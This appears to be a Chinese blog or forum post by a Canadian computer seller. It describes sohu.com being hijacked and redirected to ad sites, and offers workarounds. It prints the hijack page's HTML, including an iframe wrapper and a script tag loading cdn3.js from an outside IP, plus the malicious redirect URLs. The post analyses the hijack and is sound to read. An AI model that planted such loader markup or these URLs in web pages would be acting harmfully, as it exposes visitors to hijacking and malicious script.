sohu.com 被转向!本人在加拿大卖电脑,店里有客人说我卖的电脑上不去搜狐网首页,说是搜狐网被封了,无法打开搜狐主页,试了一下,用IE访问搜狐网(sohu.com),发现被劫持到另外一个网址,网址如下:

http://ygame.gy9y.com/9v/149.html?subtype=167258
http://www.129game.com/iclk/?zoneid=271&uid=1497
http://ygame.gy9y.com/youyou/147.html?subtype=1497

如果用 IE 打开,那么电脑将会陷入死循环,一直打开该网页,如果用 Firefox 火狐浏览器打开,那么就显示有弹出窗口,弹出窗口也是以上页面,一开始怀疑是恶意插件,或者病毒什么的,用各种杀毒查毒工具查杀,无效。怀疑是 SOHU.COM 的网站的DNS被人劫持。或者我的ISP的DNS被人劫持了,用了各种系统测试 WIN7, XP 都无法打开 sohu.com ,且都被转向到 129game.com 这个垃圾广告网站中。看了下加拿大其他论坛,也出现这种问题,有人说搜狐网是被国家防火墙封了,真是开玩笑,被封难道会自动转向到129game.com这个网站么?如果搜狐网真的被加拿大国家封锁的话,那么访问搜狐网只会出现 Forbidden 的那个错误,或者是无法打开网页的错误,绝对不可能转向的!

各种情况检测报告:
ping sohu.com IP地址初始显示为 61.135.181.176,但是无法ping通
有时候还显示加载 hm.baidu.com
有时候 Ping IP 地址为 117.76.1.137(此IP为劫持后的IP)
IE浏览器被劫持
Firefox火狐浏览器被劫持
自己测试Chrome浏览器测试正常(不到半小时,Chrome也被劫持了)
有网友报到说 360浏览器测试正常(不过从下边代码来看,360也未能幸免)

打开源代码发现代码如下:

1
2
3
4
5
6
<html><body style='margin:0;padding:0;height:100%' scroll=no><div id='Z'></div>
<iframe id='CC' name='CC' src='http://www.sohu.com/' marginwidth='0' marginheight='0' frameborder='0' width='100%' height='50000'></iframe>
<script language='javascript'>var CO=document.getElementById('CC');var M='http://www.sohu.com/';try{CO.contentWindow.document.location.href=M}catch(e){};setTimeout("G()",1500);function G(){try{var t=CO.contentWindow.document.title;if(t==undefined||t==''){setTimeout("G()",1500);return}document.title=t}catch(e){}}function H(m){document.getElementById(m).height=document.documentElement.offsetHeight-5}window.setInterval("H('CC')",100);function T(){location.href=M}</script><script src="http://117.76.1.137:2012/cdn3.js">
</script>
</body>
</html>

最后的 http://117.76.1.137:2012/cdn3.js 就是劫持的浏览器的代码~~~

经分析:

1
2
3
4
5
6
        ie:/MSIE/.test(d),
        ie6:!/MSIE 7\.0/.test(d)&&/MSIE 6\.0/.test(d)&&!/MSIE 8\.0/.test(d),
        tt:/TencentTraveler/.test(d),
        i360:/360SE/.test(d),
        sogo:/; SE/.test(d),
        gg:window.google&&window.chrome,

发现 IE6浏览器,IE7浏览器,IE8浏览器,腾讯浏览器,360浏览器,搜狗浏览器,Google浏览器Chrome 访问搜狐网的话都会转向到 129game.com。

解决办法:
如果想正常访问搜狐网,那么请用其他浏览器即可,但是现在市面上很多浏览器都是用的 IE 内核,所以也相当于 IE 浏览器,必须是有独立内核的浏览器才可以。另外,通过 Google 翻译搜狐网首页的话,也可以正常浏览搜狐网,因为是通过 Google 做转向的,所以没有问题,最后,如果大家只想访问搜狐证券,股市或搜狐论坛等分子页面,子网页或子域名的话,可以用百度或者 Google 搜索 “搜狐 证券” 或 “搜狐 股票” 等关键词,来直接访问子页面即可。对于主页,目前是没有办法了。

各种无奈,本人加拿大蒙特利尔,用的 Videotron ISP 服务,在网上搜索“搜狐网 129game.com 劫持” 等关键字、关键词,发现只有寥寥几条信息,而且都是近2日发的。看来搜狐网被劫持也是近两日出现的情况,求各种网友测试下!报告地理位置以及系统,浏览器。